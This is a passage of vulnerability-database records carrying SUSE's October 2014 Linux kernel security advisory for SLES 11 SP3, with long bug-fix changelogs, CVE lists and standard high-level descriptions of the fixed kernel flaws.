net/sched/act_police.ko (bnc#890426)\n * tcp: adapt selected parts of RFC 5682 and PRR logic (bnc#879921).\n * tg3: Change nvram command timeout value to 50ms (bnc#855657).\n * tg3: Override clock, link aware and link idle mode during NVRAM dump\n (bnc#855657).\n * tg3: Set the MAC clock to the fastest speed during boot code load\n (bnc#855657).\n * usb: Does not enable LPM if the exit latency is zero (bnc#832309).\n * usbcore: Does not log on consecutive debounce failures of the same\n port (bnc#888105).\n * usbhid: fix PIXART optical mouse (bnc#888607).\n * uswsusp: Disable when module loading is restricted (bnc#884333).\n * vscsi: support larger transfer sizes (bnc#774818).\n * writeback: Do not sync data dirtied after sync start (bnc#833820).\n * x86 thermal: Delete power-limit-notification console messages\n (bnc#882317).\n * x86 thermal: Disable power limit notification interrupt by default\n (bnc#882317).\n * x86 thermal: Re-enable power limit notification interrupt by default\n (bnc#882317).\n * x86, cpu hotplug: Fix stack frame warning in\n check_irq_vectors_for_cpu_disable() (bnc#887418).\n * x86/UV: Add call to KGDB/KDB from NMI handler (bnc#888847).\n * x86/UV: Add kdump to UV NMI handler (bnc#888847).\n * x86/UV: Add summary of cpu activity to UV NMI handler (bnc#888847).\n * x86/UV: Move NMI support (bnc#888847).\n * x86/UV: Update UV support for external NMI signals (bnc#888847).\n * x86/uv/nmi: Fix Sparse warnings (bnc#888847).\n * x86: Add check for number of available vectors before CPU down\n (bnc#887418).\n * x86: Lock down IO port access when module security is enabled\n (bnc#884333).\n * x86: Restrict MSR access when module loading is restricted\n (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n * CVE-2014-3153\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153</a>>\n * CVE-2014-6410\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410</a>>\n\n The SUSE Linux Enterprise 11 Service Pack 3 RealTime Extension kernel was\n updated to fix various bugs and security issues.\n\n Following security bugs were fixed: CVE-2013-1979: The scm_set_cred\n function in include/net/scm.h in the Linux kernel before 3.8.11 uses\n incorrect uid and gid values during credentials passing, which allows\n local users to gain privileges via a crafted application (bnc#816708).\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to obtain\n sensitive information from kernel memory by leveraging /dev/media0 read\n access for a MEDIA_IOC_ENUM_ENTITIES ioctl call (bnc#882804).\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does not\n properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel through\n 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the\n sep CPU feature flag is set, allows local users to cause a denial of\n service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n CVE-2014-4667: The sctp_association_free function in net/sctp/associola.c\n in the Linux kernel before 3.15.2 does not properly manage a certain\n backlog value, which allows remote attackers to cause a denial of service\n (socket outage) via a crafted SCTP packet (bnc#885422).\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux\n kernel through 3.15.6 allows local users to gain privileges by leveraging\n data-structure differences between an l2tp socket and an inet socket\n (bnc#887082).\n\n CVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c in\n the Linux kernel through 3.15.8, when SCTP authentication is enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference and OOPS) by starting to establish an association between two\n endpoints immediately after an exchange of INIT and INIT ACK chunks to\n establish an earlier association between these endpoints in the opposite\n direction (bnc#889173).\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n CVE-2014-3153 The futex_requeue function in kernel/futex.c in the Linux\n kernel through 3.14.5 does not ensure that calls have two different futex\n addresses, which allows local users to gain privileges via a crafted\n FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n (bnc#880892)\n\n CVE-2014-6410: Avoid infinite loop when processing indirect ICBs\n (bnc#896689)\n\n The following non-security bugs were fixed: - ACPI / PAD: call schedule()\n when need_resched() is true (bnc#866911). - ACPI: Fix bug when ACPI reset\n register is implemented in system memory (bnc#882900). - ACPI: Limit\n access to custom_method (bnc#884333). - ALSA: hda - Enabling Realtek ALC\n 671 codec (bnc#891746). - Add option to automatically enforce module\n signatures when in Secure Boot mode (bnc#884333). - Add secure_modules()\n call (bnc#884333).\n - Add wait_on_atomic_t() and wake_up_atomic_t() (bnc#880344). - Backported\n new patches of Lock down functions for UEFI secure boot Also updated\n series.conf and removed old patches. - Btrfs: Return EXDEV for cross\n file system snapshot. - Btrfs: abort the transaction when we does not\n find our extent ref. - Btrfs: avoid warning bomb of\n btrfs_invalidate_inodes. - Btrfs: cancel scrub on transaction abortion.\n - Btrfs: correctly set profile flags on seqlock retry. - Btrfs: does not\n check nodes for extent items. - Btrfs: fix a possible deadlock between\n scrub and transaction committing. - Btrfs: fix corruption after\n write/fsync failure + fsync + log recovery (bnc#894200). - Btrfs: fix\n csum tree corruption, duplicate and outdated checksums (bnc#891619). -\n Btrfs: fix double free in find_lock_delalloc_range. - Btrfs: fix\n possible memory leak in btrfs_create_tree(). - Btrfs: fix use of uninit\n "ret" in end_extent_writepage(). - Btrfs: free delayed node outside of\n root->inode_lock (bnc#866864). - Btrfs: make DEV_INFO ioctl available to\n anyone. - Btrfs: make FS_INFO ioctl available to anyone. - Btrfs: make\n device scan less noisy. - Btrfs: make sure there are not any read\n requests before stopping workers. - Btrfs: more efficient io tree\n navigation on wait_extent_bit. - Btrfs: output warning instead of error\n when loading free space cache failed. - Btrfs: retrieve more info from\n FS_INFO ioctl. - Btrfs: return EPERM when deleting a default subvolume\n (bnc#869934). - Btrfs: unset DCACHE_DISCONNECTED when mounting default\n subvol (bnc#866615).\n - Btrfs: use right type to get real comparison. - Btrfs: wake up\n @scrub_pause_wait as much as we can. - Btrfs: wake up transaction thread\n upon remount. - CacheFiles: Add missing retrieval completions\n (bnc#880344).\n - CacheFiles: Does not try to dump the index key if the cookie has been\n cleared (bnc#880344). - CacheFiles: Downgrade the requirements passed to\n the allocator (bnc#880344). - CacheFiles: Fix the marking of cached\n pages (bnc#880344). - CacheFiles: Implement invalidation (bnc#880344). -\n CacheFiles: Make some debugging statements conditional (bnc#880344). -\n Drivers: hv: util: Fix a bug in the KVP code (bnc#886840). - Drivers:\n hv: vmbus: Fix a bug in the channel callback dispatch code (bnc#886840).\n - FS-Cache: Add transition to handle invalidate immediately after lookup\n (bnc#880344). - FS-Cache: Check that there are no read ops when cookie\n relinquished (bnc#880344). - FS-Cache: Clear remaining page count on\n retrieval cancellation (bnc#880344). - FS-Cache: Convert the object\n event ID #defines into an enum (bnc#880344). - FS-Cache: Does not sleep\n in page release if __GFP_FS is not set (bnc#880344). - FS-Cache: Does\n not use spin_is_locked() in assertions (bnc#880344). - FS-Cache:\n Exclusive op submission can BUG if there is been an I/O error\n (bnc#880344). - FS-Cache: Fix __wait_on_atomic_t() to call the action\n func if the counter != 0 (bnc#880344). - FS-Cache: Fix object state\n machine to have separate work and wait states (bnc#880344). - FS-Cache:\n Fix operation state management and accounting (bnc#880344). - FS-Cache:\n Fix signal handling during waits (bnc#880344). - FS-Cache: Initialise\n the object event mask with the calculated mask (bnc#880344). - FS-Cache:\n Limit the number of I/O error reports for a cache (bnc#880344). -\n FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344). - FS-Cache: Mark cancellation of in-progress operation\n (bnc#880344). - FS-Cache: One of the write operation paths doeses not\n set the object state (bnc#880344). - FS-Cache: Provide proper\n invalidation (bnc#880344). - FS-Cache: Simplify cookie retention for\n fscache_objects, fixing oops (bnc#880344). - FS-Cache: The retrieval\n remaining-pages counter needs to be atomic_t (bnc#880344). - FS-Cache:\n Uninline fscache_object_init() (bnc#880344). - FS-Cache: Wrap checks on\n object state (bnc#880344). - HID: usbhid: add always-poll quirk\n (bnc#888607). - HID: usbhid: enable always-poll quirk for Elan\n Touchscreen (bnc#888607). - IB/iser: Add TIMEWAIT_EXIT event handling\n (bnc#890297). - Ignore "flags" change to event_constraint (bnc#876114). -\n Ignore data_src/weight changes to perf_sample_data (bnc#876114). - NFS:\n Allow more\n operations in an NFSv4.1 request (bnc#890513). - NFS: Clean up helper\n function nfs4_select_rw_stateid() (bnc#888968). - NFS: Does not copy read\n delegation stateids in setattr (bnc#888968). - NFS: Does not use a\n delegation to open a file when returning that delegation (bnc#888968,\n bnc#892200, bnc#893596, bnc#893496) - NFS: Fixes for NFS RCU-walk support\n in line with code going upstream - NFS: Use FS-Cache invalidation\n (bnc#880344). - NFS: allow lockless access to access_cache (bnc#866130).\n - NFS: avoid mountpoint being displayed as " (deleted)" in /proc/mounts\n (bnc#888591). - NFS: nfs4_do_open should add negative results to the\n dcache (bnc#866130). - NFS: nfs_migrate_page() does not wait for FS-Cache\n to finish with a page (bnc#880344). - NFS: nfs_open_revalidate: only\n evaluate parent if it will be used (bnc#866130). - NFS: prepare for\n RCU-walk support but pushing tests later in code (bnc#866130). - NFS:\n support RCU_WALK in nfs_permission() (bnc#866130). - NFS: teach\n nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130). - NFS: teach\n nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130). - NFSD: Does\n not hand out delegations for 30 seconds after recalling them\n (bnc#880370). - NFSv4 set open access\n operation call flag in nfs4_init_opendata_res (bnc#888968, bnc#892200,\n bnc#893596, bnc#893496). - NFSv4: Add a helper for encoding opaque data\n (bnc#888968). - NFSv4: Add a helper for encoding stateids (bnc#888968). -\n NFSv4: Add helpers for basic copying of stateids (bnc#888968). - NFSv4:\n Clean up nfs4_select_rw_stateid() (bnc#888968). - NFSv4: Fix the return\n value of nfs4_select_rw_stateid (bnc#888968). - NFSv4: Rename\n nfs4_copy_stateid() (bnc#888968). - NFSv4: Resend the READ/WRITE RPC call\n if a stateid change causes an error (bnc#888968). - NFSv4: Simplify the\n struct nfs4_stateid (bnc#888968). - NFSv4: The stateid must remain the\n same for replayed RPC calls (bnc#888968). - NFSv4:\n nfs4_stateid_is_current should return "true" for an invalid stateid\n (bnc#888968). - One more fix for kABI breakage. - PCI: Lock down BAR\n access when module security is enabled (bnc#884333). - PCI: enable MPS\n "performance" setting to properly handle bridge MPS (bnc#883376). - PM /\n Hibernate: Add memory_rtree_find_bit function (bnc#860441). - PM /\n Hibernate: Create a Radix-Tree to store memory bitmap (bnc#860441). - PM\n / Hibernate: Implement position keeping in radix tree (bnc#860441). - PM\n / Hibernate: Iterate over set bits instead of PFNs in swsusp_free()\n (bnc#860441). - PM / Hibernate: Remove the old memory-bitmap\n implementation (bnc#860441). - PM / Hibernate: Touch Soft Lockup Watchdog\n in rtree_next_node (bnc#860441). - Restrict /dev/mem and /dev/kmem when\n module loading is restricted (bnc#884333). - Reuse existing "state" field\n to indicate PERF_X86_EVENT_PEBS_LDLAT (bnc#876114). - USB: handle LPM\n errors during device suspend correctly (bnc#849123). - Update kabi files\n to reflect fscache change (bnc#880344) - Update x86_64 config files:\n re-enable SENSORS_W83627EHF (bnc#891281) - VFS: Make more complete\n truncate operation available to CacheFiles (bnc#880344). - [FEAT NET1222]\n ib_uverbs: Allow explicit mmio trigger (FATE#83366, ltc#83367). - acpi:\n Ignore acpi_rsdp kernel parameter when module loading is restricted\n (bnc#884333). - af_iucv: correct cleanup if listen backlog is full\n (bnc#885262, LTC#111728). - asus-wmi: Restrict debugfs interface when\n module loading is restricted (bnc#884333). - autofs4: allow RCU-walk to\n walk through autofs4 (bnc#866130). - autofs4: avoid taking fs_lock during\n rcu-walk (bnc#866130). - autofs4: does not take spinlock when not needed\n in autofs4_lookup_expiring (bnc#866130). - autofs4: factor\n should_expire() out\n of autofs4_expire_indirect (bnc#866130). - autofs4: make\n "autofs4_can_expire" idempotent (bnc#866130). - autofs4: remove a\n redundant assignment (bnc#866130). - autofs: fix lockref lookup\n (bnc#888591). - be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759). - block: add cond_resched() to potentially long running\n ioctl discard loop (bnc#884725). - block: fix race between request\n completion and timeout handling (bnc#881051). - cdc-ether: clean packet\n filter upon probe (bnc#876017). - cpuset: Fix memory allocator deadlock\n (bnc#876590). - crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not\n all archs have them, but some are FIPS certified, with some kernel\n support. - crypto: fips\n - only panic on bad/missing crypto mod signatures (bnc#887503). - crypto:\n testmgr - allow aesni-intel and ghash_clmulni-intel in fips mode\n (bnc#889451). - dasd: validate request size before building CCW/TCW\n (bnc#891087, LTC#114068). - dm mpath: fix race condition between\n multipath_dtr and pg_init_done (bnc#826486). - dm-mpath: fix panic on\n deleting sg device (bnc#870161). - drm/ast: AST2000 cannot be detected\n correctly (bnc#895983). - drm/ast: Actually load DP501 firmware when\n required (bnc#895608 bnc#871134). - drm/ast: Add missing entry to\n dclk_table[]. - drm/ast: Add reduced non reduced mode parsing for wide\n screen mode (bnc#892723). - drm/ast: initial DP501 support (v0.2)\n (bnc#871134). - drm/ast: open key before detect chips (bnc#895983). -\n drm/i915: Fix up cpt pixel multiplier enable sequence (bnc#879304). -\n drm/i915: Only apply DPMS to the encoder if enabled (bnc#893064). -\n drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at driver init (bnc#869055).\n - drm/i915: create functions for the "unclaimed register" checks\n (bnc#869055). - drm/i915: use FPGA_DBG for the "unclaimed register"\n checks (bnc#869055). - drm/mgag200: Initialize data needed to map fbdev\n memory (bnc #806990). - e1000e: enable support for new device IDs\n (bnc#885509). - fs/fscache: remove spin_lock() from the condition in\n while() (bnc#880344).\n - hibernate: Disable in a signed modules environment (bnc#884333). -\n hugetlb: does not use ERR_PTR with VM_FAULT* values - ibmvscsi: Abort\n init sequence during error recovery (bnc#885382). - ibmvscsi: Add memory\n barriers for send / receive (bnc#885382). - inet: add a redirect\n generation id in inetpeer (bnc#860593). - inetpeer: initialize\n ->redirect_genid in inet_getpeer() (bnc#860593). - ipv6: tcp: fix\n tcp_v6_conn_request() (bnc#887645). - kabi: hide bnc#860593 changes of\n struct inetpeer_addr_base (bnc#860593). - kernel: 3215 tty hang\n (bnc#891087, LTC#114562). - kernel: fix data corruption when reading\n /proc/sysinfo (bnc#891087, LTC#114480). - kernel: fix kernel oops with\n load of fpc register (bnc#889061, LTC#113596).\n - kernel: sclp console tty reference counting (bnc#891087, LTC#115466). -\n kexec: Disable at runtime if the kernel enforces module loading\n restrictions (bnc#884333). - md/raid6: avoid data corruption during\n recovery of double-degraded RAID6. - memcg, vmscan: Fix forced scan of\n anonymous pages (memory reclaim fix). - memcg: do not expose\n uninitialized mem_cgroup_per_node to world (bnc#883096). - mm, hugetlb:\n add VM_NORESERVE check in vma_has_reserves() - mm, hugetlb: change\n variable name reservations to resv - mm, hugetlb: decrement reserve\n count if VM_NORESERVE alloc page cache - mm, hugetlb: defer freeing\n pages when gathering surplus pages - mm, hugetlb: do not use a page in\n page cache for cow optimization - mm, hugetlb: fix and clean-up node\n iteration code to alloc or free - mm, hugetlb: fix race in region\n tracking - mm, hugetlb: fix subpool accounting handling - mm, hugetlb:\n improve page-fault scalability - mm, hugetlb: improve, cleanup resv_map\n parameters - mm, hugetlb: move up the code which check availability of\n free huge page - mm, hugetlb: protect reserved pages when soft offlining\n a hugepage - mm, hugetlb: remove decrement_hugepage_resv_vma() - mm,\n hugetlb: remove redundant list_empty check in gather_surplus_pages() -\n mm, hugetlb: remove resv_map_put - mm, hugetlb: remove useless check\n about mapping type - mm, hugetlb: return a reserved page to a reserved\n pool if failed - mm, hugetlb: trivial commenting fix - mm, hugetlb:\n unify region structure handling - mm, hugetlb: unify region structure\n handling kabi - mm, hugetlb: use long vars instead of int in\n region_count() (Hugetlb Fault Scalability). - mm, hugetlb: use\n vma_resv_map() map types - mm, oom: fix badness score underflow\n (bnc#884582, bnc#884767). - mm, oom: normalize oom scores to\n oom_score_adj scale only for userspace (bnc#884582, bnc#884767). - mm,\n thp: do not allow thp faults to avoid cpuset restrictions (bnc#888849). -\n net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680). - net/mlx4_core: Load the IB driver when the device\n supports IBoE (bnc#887680). - net/mlx4_en: Fix a race between napi poll\n function and RX ring cleanup (bnc#863586). - net/mlx4_en: Fix selftest\n failing on non 10G link speed (bnc#888058). - net: fix checksumming\n features handling in\n output path (bnc#891259). - pagecache_limit: batch large nr_to_scan\n targets (bnc#895221). - pagecachelimit: reduce lru_lock congestion for\n heavy parallel reclaim fix (bnc#895680). - perf/core: Add weighted\n samples (bnc#876114). - perf/x86: Add flags to event constraints\n (bnc#876114). - perf/x86: Add memory profiling via PEBS Load Latency\n (bnc#876114). - perf: Add generic memory sampling interface (bnc#876114).\n - qla2xxx: Avoid escalating the SCSI error handler if the command is not\n found in firmware (bnc#859840). - qla2xxx: Clear loop_id for ports that\n are marked lost during fabric scanning (bnc#859840). - qla2xxx: Does not\n check for firmware hung during the reset context for ISP82XX\n (bnc#859840). - qla2xxx: Issue abort command for outstanding commands\n during cleanup when only firmware is alive (bnc#859840). - qla2xxx:\n Reduce the time we wait for a command to complete during SCSI error\n handling (bnc#859840). - qla2xxx: Set host can_queue value based on\n available resources (bnc#859840). - restore smp_mb() in\n unlock_new_inode() (bnc#890526). - s390/pci: introduce lazy IOTLB\n flushing for DMA unmap (bnc#889061, LTC#113725). - sched: fix the\n theoretical signal_wake_up() vs schedule() race (bnc#876055). -\n sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035). - scsi_dh: use missing accessor "scsi_device_from_queue"\n (bnc#889614). - scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail\n (bnc#887608). - scsiback: correct grant page unmapping. - scsiback: fix\n retry handling in __report_luns(). - scsiback: free resources after\n error. - sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130). - supported.conf: remove external from drivers/net/veth\n (bnc#889727) - supported.conf: support net/sched/act_police.ko\n (bnc#890426) - tcp: adapt selected parts of RFC 5682 and PRR logic\n (bnc#879921). - tg3: Change nvram command timeout value to 50ms\n (bnc#855657). - tg3: Override clock, link aware and link idle mode during\n NVRAM dump (bnc#855657). - tg3: Set the MAC clock to the fastest speed\n during boot code load (bnc#855657). - usb: Does not enable LPM if the\n exit latency is zero (bnc#832309). - usbcore: Does not log on consecutive\n debounce failures of the same port (bnc#888105). - usbhid: fix PIXART\n optical mouse (bnc#888607). - uswsusp: Disable when module loading is\n restricted (bnc#884333). - vscsi: support larger transfer sizes\n (bnc#774818). - writeback: Do not sync data dirtied after sync start\n (bnc#833820). - x86 thermal: Delete power-limit-notification console\n messages (bnc#882317). - x86 thermal: Disable power limit notification\n interrupt by default (bnc#882317). - x86 thermal: Re-enable power limit\n notification interrupt by default (bnc#882317). - x86, cpu hotplug: Fix\n stack frame warning in check_irq_vectors_for_cpu_disable() (bnc#887418).\n - x86/UV: Add call to KGDB/KDB from NMI handler (bnc#888847). - x86/UV:\n Add kdump to UV NMI handler (bnc#888847). - x86/UV: Add summary of cpu\n activity to UV NMI handler (bnc#888847). - x86/UV: Move NMI support\n (bnc#888847). - x86/UV: Update UV support for external NMI signals\n (bnc#888847). - x86/uv/nmi: Fix Sparse warnings (bnc#888847). - x86: Add\n check for number\n of available vectors before CPU down (bnc#887418). - x86: Lock down IO\n port access when module security is enabled (bnc#884333). - x86: Restrict\n MSR access when module loading is restricted (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n * CVE-2014-3153\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153</a>>\n * CVE-2014-6410\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410</a>>\n", "edition": 1, "modified": "2014-10-23T01:08:35", "published": "2014-10-23T01:08:35", "id": "SUSE-SU-2014:1319-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00007.html", "type": "suse", "title": "Security update for Linux kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:26:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-1739", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-4027", "CVE-2013-1979", "CVE-2014-3153", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-4667", "CVE-2014-2706"], "edition": 1, "description": "The SUSE Linux Enterprise 11 Service Pack 3 kernel has been updated to fix\n various bugs and security issues.\n\n The following security bugs have been fixed:\n\n *\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to\n obtain sensitive information from kernel memory by leveraging\n /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call\n (bnc#882804).\n\n *\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does\n not properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n *\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel\n through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled\n and the sep CPU feature flag is set, allows local users to cause a denial\n of service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n *\n\n CVE-2014-4667: The sctp_association_free function in\n net/sctp/associola.c in the Linux kernel before 3.15.2 does not properly\n manage a certain backlog value, which allows remote attackers to cause a\n denial of service (socket outage) via a crafted SCTP packet (bnc#885422).\n\n *\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\n Linux kernel through 3.15.6 allows local users to gain privileges by\n leveraging data-structure differences between an l2tp socket and an inet\n socket (bnc#887082).\n\n *\n\n CVE-2014-5077: The sctp_assoc_update function in\n net/sctp/associola.c in the Linux kernel through 3.15.8, when SCTP\n authentication is enabled, allows remote attackers to cause a denial of\n service (NULL pointer dereference and OOPS) by starting to establish an\n association between two endpoints immediately after an exchange of INIT\n and INIT ACK chunks to establish an earlier association between these\n endpoints in the opposite direction (bnc#889173).\n\n *\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n *\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n *\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n *\n\n 